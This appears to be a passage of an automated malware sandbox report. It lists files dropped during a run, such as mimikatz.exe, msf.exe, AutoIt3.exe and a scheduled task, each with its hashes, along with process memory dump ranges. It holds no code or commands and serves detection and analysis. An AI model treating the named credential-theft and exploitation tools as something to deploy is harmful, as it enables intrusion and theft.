| SHA512 | 57017466deb54d0a7a582a5352cbc90600b08cc4b0bd7c0ebf017d30f008507ef9d5257920bc76ffb0e271b9dc358eed7dadefbb2d305d4f6da53bf51a65d3f0 |
memory/4104-10991-0x0000000000E90000-0x0000000000EA6000-memory.dmp
memory/7192-11030-0x0000000000D80000-0x00000000010A4000-memory.dmp
memory/4664-11237-0x0000000000A40000-0x0000000000D64000-memory.dmp
memory/2140-11531-0x0000000000A20000-0x0000000000D44000-memory.dmp
memory/6692-11657-0x0000000000CF0000-0x0000000001014000-memory.dmp
memory/6836-11778-0x0000000000930000-0x0000000000C54000-memory.dmp
memory/6028-12008-0x0000000000D20000-0x0000000001044000-memory.dmp
C:\ProgramData\adbabbcfdbc.cfg
| MD5 | 7712f3490a250619730314c9e76971ef |
| SHA1 | 1e15ddfcf03033cfc45d7e7d603cfd4d3720a086 |
| SHA256 | 972bcf2d3f9c22628cc3fb6b478085c3616a2053eea636462a2ea84407164f24 |
| SHA512 | 7c498573dd89ba140ea4a824f5df16e6d57b6755d3fcad5413579d2739b375669c5778874e81b93aba695ff3fc6a387b975fbac964b51c4ebf9b2abb8279aa5f |
memory/7892-12121-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/2740-12187-0x0000000000680000-0x00000000009A4000-memory.dmp
memory/7892-12188-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/6652-12291-0x00000000008E0000-0x0000000000C04000-memory.dmp
memory/7084-12305-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/7084-12372-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/6352-12456-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/6352-12572-0x0000000000A20000-0x000000000119B000-memory.dmp
memory/6880-12595-0x0000000000A70000-0x0000000000A82000-memory.dmp
memory/5952-12835-0x0000000000610000-0x0000000000934000-memory.dmp
C:\ProgramData\wvtynvwe\AutoIt3.exe
| MD5 | 0adb9b817f1df7807576c2d7068dd931 |
| SHA1 | 4a1b94a9a5113106f40cd8ea724703734d15f118 |
| SHA256 | 98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b |
| SHA512 | 883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a |
C:\Users\Admin\Desktop\Files\856.exe
| MD5 | 68edafe0a1705d5c7dd1cb14fa1ca8ce |
| SHA1 | 7e9d854c90acd7452645506874c4e6f10bfdda31 |
| SHA256 | 68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d |
| SHA512 | 89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d |
memory/3724-13081-0x0000000000450000-0x0000000000686000-memory.dmp
C:\Users\Admin\Desktop\Files\ciscotest.exe
| MD5 | 0076324b407d0783137badc7600327a1 |
| SHA1 | 29e6cb1f18a43b8e293539d50272898a8befa341 |
| SHA256 | 55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583 |
| SHA512 | 96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4 |
memory/3724-13090-0x0000000005150000-0x000000000522C000-memory.dmp
memory/3724-14227-0x0000000005310000-0x0000000005368000-memory.dmp
memory/3724-14565-0x00000000050C0000-0x0000000005114000-memory.dmp
C:\Windows\System32\Tasks\Test Task17
| MD5 | b929f752eefcbc69fa7b6c4cb52b3a00 |
| SHA1 | dfaa828faa819a31c73e309dd1819f3446fab996 |
| SHA256 | 4023bb6ef24afd8412072ff49790efffba497a7f6bf1b8fd2f81e53c42064e8a |
| SHA512 | d3b0983f53142828a0c4c68e6bdbf5c7a5f13810b5cfee2c466b2e2da5c6953d009803712cd346b292f7d0419c9a70872e904fc1b9d4eb933ff950314825bd2f |
C:\Users\Admin\Desktop\Files\msf.exe
| MD5 | 8597aa1db8457c9b8e2e636c55a56978 |
| SHA1 | d6ee74a13ee56eb7556e88b5b646e1c3581bf163 |
| SHA256 | e1579bd0d471cdfbcadbb1b27454da080a6a5e13021033208b7592ccea607320 |
| SHA512 | 943299ec65c1ebf0e74725648419ca76bdba72cbc39accb63305f57bba45c88227e9df80aebea9dfe47014c534e7067e7e844584356c6a39097d816c27c6a22f |
memory/6812-15987-0x0000000000340000-0x0000000000664000-memory.dmp
memory/7356-16074-0x0000000000230000-0x0000000000554000-memory.dmp
memory/2724-16198-0x0000000000C60000-0x0000000000F84000-memory.dmp
memory/4784-16202-0x0000000000560000-0x0000000000884000-memory.dmp
C:\Users\Admin\Desktop\Files\mimikatz.exe
| MD5 | 6dca8f740c1d76413c77796c7344d861 |
| SHA1 | e747301f18bdedd2b06794a0d372ce11db8370ae |
| SHA256 | 2280e717c054c708e8930acfda84805c5ac05eced6c06a0146f836ce2f5a00ec |
| SHA512 | f7cb58a9001821cbeba7720d724715d7d3c58e2518ef36eb234095023d498bbf49a25214ad15f8297afbfdb8f26001b8b18495c64daec6a3deb4490f347dc892 |
C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
| MD5 | 2b8f487213f3da1f42779e22d7b02d1a |
| SHA1 | 77c96429d6facbd1900290c9cbfed378103b8e01 |
| SHA256 | a4da37e92ca54c8851ad144fba875b61e2018f69bbe43b11926d8f8d831b56f0 |
| SHA512 | 2db88a30fdfc1e859edb7229b2073449b5d57640e484e21d78047fd674fc194c2c790995621b4d0ed7927ec06e8325c7333a1893227e50d38b2559fc267cc6bf |
memory/6288-16528-0x0000000000BD0000-0x0000000000CB6000-memory.dmp
C:\Users\Admin\Desktop\Files\winX32.exe
| MD5 | eee37f6f66eafa13d9555dfc9ccb3805 |
| SHA1 | c9b2dd6b4bd464cb767b5ff1260dc07e223cd0b8 |
| SHA256 | ca569ad2e113c57c5ddeb1770ae4d63f579df3504306097ff8a16b1cb37dcaa9 |
| SHA512 | 9bf9709f3a1dcdf97d7c88e133702f0c46756125b65adc7b6b3d61ed7b624aa5212729f7fe95c35ef1d457175c3613b4deaf625268c9651e8bdd57201c379218 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 4bd39015c30927b5aade8b354ae4967d |
| SHA1 | e74e6c5d906f71736d9d5410daaa087f28ee78bd |
| SHA256 | 4b85f8a124c2a808e6f7e327354aaab86403dd3270d8e0f0e182ca3587d0a8d9 |
| SHA512 | ede8db463da500f4272fcdc2901a51b9196818d5f4de38294d43522a4636210f4cd7f1776f72e912f98b96f30d1491c9e4d817a1f6f760f3e780bd196affcbe4 |
C:\Users\Admin\AppData\Roaming\app
| MD5 | bbcd2be775370c1e106e66d077a93f3b |
| SHA1 | a44b6a98f30e3275fc304bc3b29e0eab8ae47f20 |
| SHA256 | a7aa76f137ba550c381cfb8e5195a01963ae49db167e1cd1e0a8b902ed81eda1 |
| SHA512 | bb6e0d1f24253a9525fd538debf8ca68eb7078cb8539140c184331a854ecdea192fbcc314c4154a0a474c9aec41a79efeb8150922454c3c9e71eeb5297ae2f72 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Discord.exe.log
| MD5 | b4e91d2e5f40d5e2586a86cf3bb4df24 |
| SHA1 | 31920b3a41aa4400d4a0230a7622848789b38672 |
| SHA256 | 5d8af3c7519874ed42a0d74ee559ae30d9cc6930aef213079347e2b47092c210 |
| SHA512 | 968751b79a98961f145de48d425ea820fd1875bae79a725adf35fc8f4706c103ee0c7babd4838166d8a0dda9fbce3728c0265a04c4b37f335ec4eaa110a2b319 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 592ab7edba153a868690f737ca51b7e2 |
| SHA1 | aa5381cd2f1b7ae954b369212b748c5d348e3002 |
| SHA256 | 7632ef4855cf6d0ec1b69def6853378ca049484b4361e10139bbb727a68fe03a |
| SHA512 | c26c4fa0f310c8932bdaff7c83d5081214ebf5109a71181767cccc9adbc0233d18ab9627e01f3b3f83f7ffdde71af0cda6e6c2345845f07650f6108a5d98682e |